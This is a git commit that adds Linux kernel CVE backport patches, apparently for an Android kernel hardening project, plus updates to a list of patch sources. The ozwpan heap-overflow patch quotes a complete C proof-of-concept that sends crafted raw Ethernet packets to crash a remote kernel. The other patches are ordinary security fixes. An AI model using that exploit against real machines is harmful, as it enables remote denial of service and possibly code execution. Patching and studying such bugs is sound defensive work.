Add more patches

This commit is contained in:
Tad 2017-11-08 03:23:39 -05:00
parent 397e66c977
commit aaa94329a5
8 changed files with 814 additions and 1 deletions

View File

@ -2,8 +2,18 @@
# https://source.android.com/security/bulletin # https://source.android.com/security/bulletin
# https://cve.lineageos.org # https://cve.lineageos.org
# https://www.codeaurora.org/security-advisories # https://www.codeaurora.org/security-advisories
# https://github.com/google/syzkaller/tree/master/docs/linux # https://www.codeaurora.org/security-advisories/security-bulletins
# https://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md
# + some extras # + some extras
#To Do
# Make another pass through LineageOS CVE tracker for more patch versions
#To add
# https://github.com/google/syzkaller/blob/master/docs/linux/found_bugs.md
# https://www.codeaurora.org/security-advisory/uncontrolled-memory-mapping-in-camera-driver-cve-2013-2595
# https://www.codeaurora.org/security-advisory/multiple-issues-in-camera-drivers-cve-2014-9410-cve-2015-0568
# https://portland.source.codeaurora.org/patches/quic/la/
#The 'Untracked' folder contains patches from the following sources
# https://portland.source.codeaurora.org/patches/quic/la/CVE-fixes-patches.zip
CVE-2012-4220 CVE-2012-4220
Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=32682d16fb46a60a7952c4d9e0653602ff674e4b Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=32682d16fb46a60a7952c4d9e0653602ff674e4b
CVE-2012-4221 CVE-2012-4221

View File

@ -0,0 +1,220 @@
From 39a4e1c2675ab45cec548a99ad770faa769ee27a Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld" <Jason@zx2c4.com>
Date: Mon, 29 May 2017 12:36:54 +0530
Subject: ozwpan: Use unsigned ints to prevent heap overflow
[ Upstream commit: b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c ]
Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length, resulting in huge amounts of network-supplied
data being copied into the heap, which could potentially lead to remote
code execution.. This is remotely triggerable with a magic packet.
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.
=-=-=-=-=-=
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Change-Id: Ibc1a8b7baa06332b2a7fe7135c68faee1bd791d9
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Akshaya <akshayab@codeaurora.org>
---
drivers/staging/ozwpan/ozhcd.c | 8 ++++----
drivers/staging/ozwpan/ozusbif.h | 4 ++--
2 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/drivers/staging/ozwpan/ozhcd.c b/drivers/staging/ozwpan/ozhcd.c
index e880452..628e4e2 100644
--- a/drivers/staging/ozwpan/ozhcd.c
+++ b/drivers/staging/ozwpan/ozhcd.c
@@ -746,8 +746,8 @@ void oz_hcd_pd_reset(void *hpd, void *hport)
/*
* Context: softirq
*/
-void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc,
- int length, int offset, int total_size)
+void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status, const u8 *desc,
+ u8 length, u16 offset, u16 total_size)
{
struct oz_port *port = (struct oz_port *)hport;
struct urb *urb;
@@ -759,8 +759,8 @@ void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc,
if (!urb)
return;
if (status == 0) {
- int copy_len;
- int required_size = urb->transfer_buffer_length;
+ unsigned int copy_len;
+ unsigned int required_size = urb->transfer_buffer_length;
if (required_size > total_size)
required_size = total_size;
diff --git a/drivers/staging/ozwpan/ozusbif.h b/drivers/staging/ozwpan/ozusbif.h
index 4249fa3..d2a6085 100644
--- a/drivers/staging/ozwpan/ozusbif.h
+++ b/drivers/staging/ozwpan/ozusbif.h
@@ -29,8 +29,8 @@ void oz_usb_request_heartbeat(void *hpd);
/* Confirmation functions.
*/
-void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status,
- const u8 *desc, int length, int offset, int total_size);
+void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status,
+ const u8 *desc, u8 length, u16 offset, u16 total_size);
void oz_hcd_control_cnf(void *hport, u8 req_id, u8 rcode,
const u8 *data, int data_len);
--
1.9.1

View File

@ -0,0 +1,169 @@
From ce7dbf611ba9db087abc984ba1807771fb0c3545 Mon Sep 17 00:00:00 2001
From: Jesse Gross <jesse@kernel.org>
Date: Fri, 26 May 2017 10:43:25 +0530
Subject: tunnels: Don't apply GRO to multiple layers of encapsulation.
[ Upstream commit: fac8e0f579695a3ecbc4d3cac369139d7f819971]
When drivers express support for TSO of encapsulated packets, they
only mean that they can do it for one layer of encapsulation.
Supporting additional levels would mean updating, at a minimum,
more IP length fields and they are unaware of this.
No encapsulation device expresses support for handling offloaded
encapsulated packets, so we won't generate these types of frames
in the transmit path. However, GRO doesn't have a check for
multiple levels of encapsulation and will attempt to build them.
UDP tunnel GRO actually does prevent this situation but it only
handles multiple UDP tunnels stacked on top of each other. This
generalizes that solution to prevent any kind of tunnel stacking
that would cause problems.
Change-Id: I072ec2fec752795bee66cf5464af48f17c837a7f
Signed-off-by: Jesse Gross <jesse@kernel.org>
Signed-off-by: Akshaya <akshayab@codeaurora.org>
---
include/linux/netdevice.h | 4 ++--
net/core/dev.c | 2 +-
net/ipv4/af_inet.c | 15 ++++++++++++++-
net/ipv4/gre_offload.c | 5 +++++
net/ipv4/udp_offload.c | 6 +++---
net/ipv6/ip6_offload.c | 15 ++++++++++++++-
6 files changed, 39 insertions(+), 8 deletions(-)
diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index 943a8301..173b250 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -1902,8 +1902,8 @@ struct napi_gro_cb {
/* Used in ipv6_gro_receive() and foo-over-udp */
u16 proto;
- /* Used in udp_gro_receive */
- u8 udp_mark:1;
+ /* Used in tunnel GRO receive */
+ u8 encap_mark:1;
/* GRO checksum is valid */
u8 csum_valid:1;
diff --git a/net/core/dev.c b/net/core/dev.c
index 9d41179..99e2387 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -4116,7 +4116,7 @@ static enum gro_result dev_gro_receive(struct napi_struct *napi, struct sk_buff
NAPI_GRO_CB(skb)->same_flow = 0;
NAPI_GRO_CB(skb)->flush = 0;
NAPI_GRO_CB(skb)->free = 0;
- NAPI_GRO_CB(skb)->udp_mark = 0;
+ NAPI_GRO_CB(skb)->encap_mark = 0;
/* Setup for GRO checksum validation */
switch (skb->ip_summed) {
diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
index b39d5ef..5589a7c 100644
--- a/net/ipv4/af_inet.c
+++ b/net/ipv4/af_inet.c
@@ -1420,6 +1420,19 @@ out:
return pp;
}
+static struct sk_buff **ipip_gro_receive(struct sk_buff **head,
+ struct sk_buff *skb)
+{
+ if (NAPI_GRO_CB(skb)->encap_mark) {
+ NAPI_GRO_CB(skb)->flush = 1;
+ return NULL;
+ }
+
+ NAPI_GRO_CB(skb)->encap_mark = 1;
+
+ return inet_gro_receive(head, skb);
+}
+
int inet_recv_error(struct sock *sk, struct msghdr *msg, int len, int *addr_len)
{
if (sk->sk_family == AF_INET)
@@ -1678,7 +1691,7 @@ static struct packet_offload ip_packet_offload __read_mostly = {
static const struct net_offload ipip_offload = {
.callbacks = {
.gso_segment = inet_gso_segment,
- .gro_receive = inet_gro_receive,
+ .gro_receive = ipip_gro_receive,
.gro_complete = inet_gro_complete,
},
};
diff --git a/net/ipv4/gre_offload.c b/net/ipv4/gre_offload.c
index abc50b4..cc7b082 100644
--- a/net/ipv4/gre_offload.c
+++ b/net/ipv4/gre_offload.c
@@ -128,6 +128,11 @@ static struct sk_buff **gre_gro_receive(struct sk_buff **head,
struct packet_offload *ptype;
__be16 type;
+ if (NAPI_GRO_CB(skb)->encap_mark)
+ goto out;
+
+ NAPI_GRO_CB(skb)->encap_mark = 1;
+
off = skb_gro_offset(skb);
hlen = off + sizeof(*greh);
greh = skb_gro_header_fast(skb, off);
diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
index 6480cea..e6d05ae 100644
--- a/net/ipv4/udp_offload.c
+++ b/net/ipv4/udp_offload.c
@@ -266,14 +266,14 @@ struct sk_buff **udp_gro_receive(struct sk_buff **head, struct sk_buff *skb,
unsigned int off = skb_gro_offset(skb);
int flush = 1;
- if (NAPI_GRO_CB(skb)->udp_mark ||
+ if (NAPI_GRO_CB(skb)->encap_mark ||
(skb->ip_summed != CHECKSUM_PARTIAL &&
NAPI_GRO_CB(skb)->csum_cnt == 0 &&
!NAPI_GRO_CB(skb)->csum_valid))
goto out;
- /* mark that this skb passed once through the udp gro layer */
- NAPI_GRO_CB(skb)->udp_mark = 1;
+ /* mark that this skb passed once through the tunnel gro layer */
+ NAPI_GRO_CB(skb)->encap_mark = 1;
rcu_read_lock();
uo_priv = rcu_dereference(udp_offload_base);
diff --git a/net/ipv6/ip6_offload.c b/net/ipv6/ip6_offload.c
index dece5c7..dbc528e 100644
--- a/net/ipv6/ip6_offload.c
+++ b/net/ipv6/ip6_offload.c
@@ -255,6 +255,19 @@ out:
return pp;
}
+static struct sk_buff **sit_gro_receive(struct sk_buff **head,
+ struct sk_buff *skb)
+{
+ if (NAPI_GRO_CB(skb)->encap_mark) {
+ NAPI_GRO_CB(skb)->flush = 1;
+ return NULL;
+ }
+
+ NAPI_GRO_CB(skb)->encap_mark = 1;
+
+ return ipv6_gro_receive(head, skb);
+}
+
static int ipv6_gro_complete(struct sk_buff *skb, int nhoff)
{
const struct net_offload *ops;
@@ -289,7 +302,7 @@ static struct packet_offload ipv6_packet_offload __read_mostly = {
static const struct net_offload sit_offload = {
.callbacks = {
.gso_segment = ipv6_gso_segment,
- .gro_receive = ipv6_gro_receive,
+ .gro_receive = sit_gro_receive,
.gro_complete = ipv6_gro_complete,
},
};
--
1.9.1

View File

@ -0,0 +1,190 @@
From 8a069274d823319273dab097e865faa01bee2451 Mon Sep 17 00:00:00 2001
From: Sabrina Dubroca <sd@queasysnail.net>
Date: Fri, 26 May 2017 15:25:08 +0530
Subject: net: add recursion limit to GRO
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
[ Backported upstream commit: fcd91dd449867c6bfe56a81cabba76b829fd05cd]
[ Files without GRO support have not been updated ]
Currently, GRO can do unlimited recursion through the gro_receive
handlers. This was fixed for tunneling protocols by limiting tunnel GRO
to one level with encap_mark, but both VLAN and TEB still have this
problem. Thus, the kernel is vulnerable to a stack overflow, if we
receive a packet composed entirely of VLAN headers.
This patch adds a recursion counter to the GRO layer to prevent stack
overflow. When a gro_receive function hits the recursion limit, GRO is
aborted for this skb and it is processed normally. This recursion
counter is put in the GRO CB, but could be turned into a percpu counter
if we run out of space in the CB.
Thanks to Vladimír Beneš <vbenes@redhat.com> for the initial bug report.
Change-Id: Iec7b958d843c5d8214a36be8187d03f9e86ef079
Fixes: CVE-2016-7039
Fixes: 9b174d88c257 ("net: Add Transparent Ethernet Bridging GRO support.")
Fixes: 66e5133f19e9 ("vlan: Add GRO support for non hardware accelerated vlan")
Signed-off-by: Sabrina Dubroca <sd@queasysnail.net>
Reviewed-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Acked-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Akshaya <akshayab@codeaurora.org>
---
drivers/net/vxlan.c | 2 +-
include/linux/netdevice.h | 24 ++++++++++++++++++++++++
net/core/dev.c | 1 +
net/ipv4/af_inet.c | 2 +-
net/ipv4/fou.c | 4 ++--
net/ipv4/gre_offload.c | 2 +-
net/ipv4/udp_offload.c | 2 +-
net/ipv6/ip6_offload.c | 2 +-
8 files changed, 32 insertions(+), 7 deletions(-)
diff --git a/drivers/net/vxlan.c b/drivers/net/vxlan.c
index 59282dd..d7cdfad 100644
--- a/drivers/net/vxlan.c
+++ b/drivers/net/vxlan.c
@@ -600,7 +600,7 @@ static struct sk_buff **vxlan_gro_receive(struct sk_buff **head, struct sk_buff
skb_gro_pull(skb, sizeof(*eh)); /* pull inner eth header */
skb_gro_postpull_rcsum(skb, eh, sizeof(*eh));
- pp = ptype->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(ptype->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index 173b250..cbcd056 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -1914,6 +1914,11 @@ struct napi_gro_cb {
/* Used in foo-over-udp, set in udp[46]_gro_receive */
u8 is_ipv6:1;
+ /* Number of gro_receive callbacks this packet already went through */
+ u8 recursion_counter:4;
+
+ /* 1 bit hole */
+
/* used to support CHECKSUM_COMPLETE for tunneling protocols */
__wsum csum;
@@ -1923,6 +1928,25 @@ struct napi_gro_cb {
#define NAPI_GRO_CB(skb) ((struct napi_gro_cb *)(skb)->cb)
+#define GRO_RECURSION_LIMIT 15
+static inline int gro_recursion_inc_test(struct sk_buff *skb)
+{
+ return ++NAPI_GRO_CB(skb)->recursion_counter == GRO_RECURSION_LIMIT;
+}
+
+typedef struct sk_buff **(*gro_receive_t)(struct sk_buff **, struct sk_buff *);
+static inline struct sk_buff **call_gro_receive(gro_receive_t cb,
+ struct sk_buff **head,
+ struct sk_buff *skb)
+{
+ if (unlikely(gro_recursion_inc_test(skb))) {
+ NAPI_GRO_CB(skb)->flush |= 1;
+ return NULL;
+ }
+
+ return cb(head, skb);
+}
+
struct packet_type {
__be16 type; /* This is really htons(ether_type). */
struct net_device *dev; /* NULL is wildcarded here */
diff --git a/net/core/dev.c b/net/core/dev.c
index 99e2387..836e4f0 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -4117,6 +4117,7 @@ static enum gro_result dev_gro_receive(struct napi_struct *napi, struct sk_buff
NAPI_GRO_CB(skb)->flush = 0;
NAPI_GRO_CB(skb)->free = 0;
NAPI_GRO_CB(skb)->encap_mark = 0;
+ NAPI_GRO_CB(skb)->recursion_counter = 0;
/* Setup for GRO checksum validation */
switch (skb->ip_summed) {
diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
index 5589a7c..4fc2ca4 100644
--- a/net/ipv4/af_inet.c
+++ b/net/ipv4/af_inet.c
@@ -1409,7 +1409,7 @@ static struct sk_buff **inet_gro_receive(struct sk_buff **head,
skb_gro_pull(skb, sizeof(*iph));
skb_set_transport_header(skb, skb_gro_offset(skb));
- pp = ops->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
diff --git a/net/ipv4/fou.c b/net/ipv4/fou.c
index 8ce8e82..7b5b280 100644
--- a/net/ipv4/fou.c
+++ b/net/ipv4/fou.c
@@ -119,7 +119,7 @@ static struct sk_buff **fou_gro_receive(struct sk_buff **head,
if (!ops || !ops->callbacks.gro_receive)
goto out_unlock;
- pp = ops->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
@@ -220,7 +220,7 @@ static struct sk_buff **gue_gro_receive(struct sk_buff **head,
/* Adjusted NAPI_GRO_CB(skb)->csum after skb_gro_pull()*/
skb_gro_postpull_rcsum(skb, guehdr, guehlen);
- pp = ops->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
diff --git a/net/ipv4/gre_offload.c b/net/ipv4/gre_offload.c
index cc7b082..370c057 100644
--- a/net/ipv4/gre_offload.c
+++ b/net/ipv4/gre_offload.c
@@ -219,7 +219,7 @@ static struct sk_buff **gre_gro_receive(struct sk_buff **head,
/* Adjusted NAPI_GRO_CB(skb)->csum after skb_gro_pull()*/
skb_gro_postpull_rcsum(skb, greh, grehlen);
- pp = ptype->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(ptype->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
index e6d05ae..f805597 100644
--- a/net/ipv4/udp_offload.c
+++ b/net/ipv4/udp_offload.c
@@ -306,7 +306,7 @@ unflush:
skb_gro_pull(skb, sizeof(struct udphdr)); /* pull encapsulating udp header */
skb_gro_postpull_rcsum(skb, uh, sizeof(struct udphdr));
NAPI_GRO_CB(skb)->proto = uo_priv->offload->ipproto;
- pp = uo_priv->offload->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(uo_priv->offload->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
diff --git a/net/ipv6/ip6_offload.c b/net/ipv6/ip6_offload.c
index dbc528e..b10c0c6 100644
--- a/net/ipv6/ip6_offload.c
+++ b/net/ipv6/ip6_offload.c
@@ -244,7 +244,7 @@ static struct sk_buff **ipv6_gro_receive(struct sk_buff **head,
skb_gro_postpull_rcsum(skb, iph, nlen);
- pp = ops->callbacks.gro_receive(head, skb);
+ pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
out_unlock:
rcu_read_unlock();
--
1.9.1

View File

@ -0,0 +1,67 @@
From e1f31f3f20ab760ebb2425e67385b2c593c35be5 Mon Sep 17 00:00:00 2001
From: Yuchung Cheng <ycheng@google.com>
Date: Fri, 26 May 2017 15:45:15 +0530
Subject: tcp: fix zero cwnd in tcp_cwnd_reduction
[ Upstream commit: 8b8a321ff72c785ed5e8b4cf6eda20b35d427390]
Patch 3759824da87b ("tcp: PRR uses CRB mode by default and SS mode
conditionally") introduced a bug that cwnd may become 0 when both
inflight and sndcnt are 0 (cwnd = inflight + sndcnt). This may lead
to a div-by-zero if the connection starts another cwnd reduction
phase by setting tp->prior_cwnd to the current cwnd (0) in
tcp_init_cwnd_reduction().
To prevent this we skip PRR operation when nothing is acked or
sacked. Then cwnd must be positive in all cases as long as ssthresh
is positive:
1) The proportional reduction mode
inflight > ssthresh > 0
2) The reduction bound mode
a) inflight == ssthresh > 0
b) inflight < ssthresh
sndcnt > 0 since newly_acked_sacked > 0 and inflight < ssthresh
Therefore in all cases inflight and sndcnt can not both be 0.
We check invalid tp->prior_cwnd to avoid potential div0 bugs.
In reality this bug is triggered only with a sequence of less common
events. For example, the connection is terminating an ECN-triggered
cwnd reduction with an inflight 0, then it receives reordered/old
ACKs or DSACKs from prior transmission (which acks nothing). Or the
connection is in fast recovery stage that marks everything lost,
but fails to retransmit due to local issues, then receives data
packets from other end which acks nothing.
Change-Id: I6edbd82492839ca86515c64ee22828f7582900aa
Fixes: 3759824da87b ("tcp: PRR uses CRB mode by default and SS mode conditionally")
Reported-by: Oleksandr Natalenko <oleksandr@natalenko.name>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Akshaya <akshayab@codeaurora.org>
---
net/ipv4/tcp_input.c | 3 +++
1 file changed, 3 insertions(+)
diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
index cc7f940..c0be23d 100644
--- a/net/ipv4/tcp_input.c
+++ b/net/ipv4/tcp_input.c
@@ -2516,6 +2516,9 @@ static void tcp_cwnd_reduction(struct sock *sk, const int prior_unsacked,
int newly_acked_sacked = prior_unsacked -
(tp->packets_out - tp->sacked_out);
+ if (newly_acked_sacked <= 0 || WARN_ON_ONCE(!tp->prior_cwnd))
+ return;
+
tp->prr_delivered += newly_acked_sacked;
if (tcp_packets_in_flight(tp) > tp->snd_ssthresh) {
u64 dividend = (u64)tp->snd_ssthresh * tp->prr_delivered +
--
1.9.1

View File

@ -0,0 +1,49 @@
From bda1fb82d50ddd35354d850456e687da43bcd794 Mon Sep 17 00:00:00 2001
From: Ignat Korchagin <ignat.korchagin@gmail.com>
Date: Thu, 17 Mar 2016 18:00:29 +0000
Subject: USB: usbip: fix potential out-of-bounds write
Fix potential out-of-bounds write to urb->transfer_buffer
usbip handles network communication directly in the kernel. When receiving a
packet from its peer, usbip code parses headers according to protocol. As
part of this parsing urb->actual_length is filled. Since the input for
urb->actual_length comes from the network, it should be treated as untrusted.
Any entity controlling the network may put any value in the input and the
preallocated urb->transfer_buffer may not be large enough to hold the data.
Thus, the malicious entity is able to write arbitrary data to kernel memory.
Signed-off-by: Ignat Korchagin <ignat.korchagin@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
(cherry picked from commit b348d7dddb6c4fbfc810b7a0626e8ec9e29f7cbb)
Change-Id: I402ca8adef71745a85ba2c51945b99d46509c06e
Signed-off-by: Akshaya <akshayab@codeaurora.org>
---
drivers/usb/usbip/usbip_common.c | 11 +++++++++++
1 file changed, 11 insertions(+)
diff --git a/drivers/usb/usbip/usbip_common.c b/drivers/usb/usbip/usbip_common.c
index facaaf0..e40da77 100644
--- a/drivers/usb/usbip/usbip_common.c
+++ b/drivers/usb/usbip/usbip_common.c
@@ -741,6 +741,17 @@ int usbip_recv_xbuff(struct usbip_device *ud, struct urb *urb)
if (!(size > 0))
return 0;
+ if (size > urb->transfer_buffer_length) {
+ /* should not happen, probably malicious packet */
+ if (ud->side == USBIP_STUB) {
+ usbip_event_add(ud, SDEV_EVENT_ERROR_TCP);
+ return 0;
+ } else {
+ usbip_event_add(ud, VDEV_EVENT_ERROR_TCP);
+ return -EPIPE;
+ }
+ }
+
ret = usbip_recv(ud->tcp_socket, urb->transfer_buffer, size);
if (ret != size) {
dev_err(&urb->dev->dev, "recv xbuf, %d\n", ret);
--
1.9.1

View File

@ -0,0 +1,107 @@
From fa3cb34c08bd88c37a9cee301e12d440e7354f4b Mon Sep 17 00:00:00 2001
From: "J. Bruce Fields" <bfields@redhat.com>
Date: Fri, 21 Apr 2017 16:10:18 -0400
Subject: nfsd: check for oversized NFSv2/v3 arguments
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
A client can append random data to the end of an NFSv2 or NFSv3 RPC call
without our complaining; we'll just stop parsing at the end of the
expected data and ignore the rest.
Encoded arguments and replies are stored together in an array of pages,
and if a call is too large it could leave inadequate space for the
reply. This is normally OK because NFS RPC's typically have either
short arguments and long replies (like READ) or long arguments and short
replies (like WRITE). But a client that sends an incorrectly long reply
can violate those assumptions. This was observed to cause crashes.
Also, several operations increment rq_next_page in the decode routine
before checking the argument size, which can leave rq_next_page pointing
well past the end of the page array, causing trouble later in
svc_free_pages.
So, following a suggestion from Neil Brown, add a central check to
enforce our expectation that no NFSv2/v3 call has both a large call and
a large reply.
As followup we may also want to rewrite the encoding routines to check
more carefully that they aren't running off the end of the page array.
We may also consider rejecting calls that have any extra garbage
appended. That would be safer, and within our rights by spec, but given
the age of our server and the NFS protocol, and the fact that we've
never enforced this before, we may need to balance that against the
possibility of breaking some oddball client.
Reported-by: Tuomas Haanpää <thaan@synopsys.com>
Reported-by: Ari Kauppi <ari@synopsys.com>
Cc: stable@vger.kernel.org
Reviewed-by: NeilBrown <neilb@suse.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
(cherry picked from commit e6838a29ecb484c97e4efef9429643b9851fba6e)
Change-Id: I7a049448dff17ffe5f9174fe07cd68495a838d40
Signed-off-by: Akshaya <akshayab@codeaurora.org>
---
fs/nfsd/nfssvc.c | 36 ++++++++++++++++++++++++++++++++++++
1 file changed, 36 insertions(+)
diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
index 752d56b..a89654b 100644
--- a/fs/nfsd/nfssvc.c
+++ b/fs/nfsd/nfssvc.c
@@ -646,6 +646,37 @@ static __be32 map_new_errors(u32 vers, __be32 nfserr)
return nfserr;
}
+/*
+ * A write procedure can have a large argument, and a read procedure can
+ * have a large reply, but no NFSv2 or NFSv3 procedure has argument and
+ * reply that can both be larger than a page. The xdr code has taken
+ * advantage of this assumption to be a sloppy about bounds checking in
+ * some cases. Pending a rewrite of the NFSv2/v3 xdr code to fix that
+ * problem, we enforce these assumptions here:
+ */
+static bool nfs_request_too_big(struct svc_rqst *rqstp,
+ struct svc_procedure *proc)
+{
+ /*
+ * The ACL code has more careful bounds-checking and is not
+ * susceptible to this problem:
+ */
+ if (rqstp->rq_prog != NFS_PROGRAM)
+ return false;
+ /*
+ * Ditto NFSv4 (which can in theory have argument and reply both
+ * more than a page):
+ */
+ if (rqstp->rq_vers >= 4)
+ return false;
+ /* The reply will be small, we're OK: */
+ if (proc->pc_xdrressize > 0 &&
+ proc->pc_xdrressize < XDR_QUADLEN(PAGE_SIZE))
+ return false;
+
+ return rqstp->rq_arg.len > PAGE_SIZE;
+}
+
int
nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
{
@@ -658,6 +689,11 @@ nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
rqstp->rq_vers, rqstp->rq_proc);
proc = rqstp->rq_procinfo;
+ if (nfs_request_too_big(rqstp, proc)) {
+ dprintk("nfsd: NFSv%d argument too large\n", rqstp->rq_vers);
+ *statp = rpc_garbage_args;
+ return 1;
+ }
/*
* Give the xdr decoder a chance to change this if it wants
* (necessary in the NFSv4.0 compound case)
--
1.9.1

View File

@ -61,6 +61,7 @@ git apply $cvePatches/CVE-2017-6345/^4.9/0001.patch
git apply $cvePatches/CVE-2017-6348/^4.9/0001.patch git apply $cvePatches/CVE-2017-6348/^4.9/0001.patch
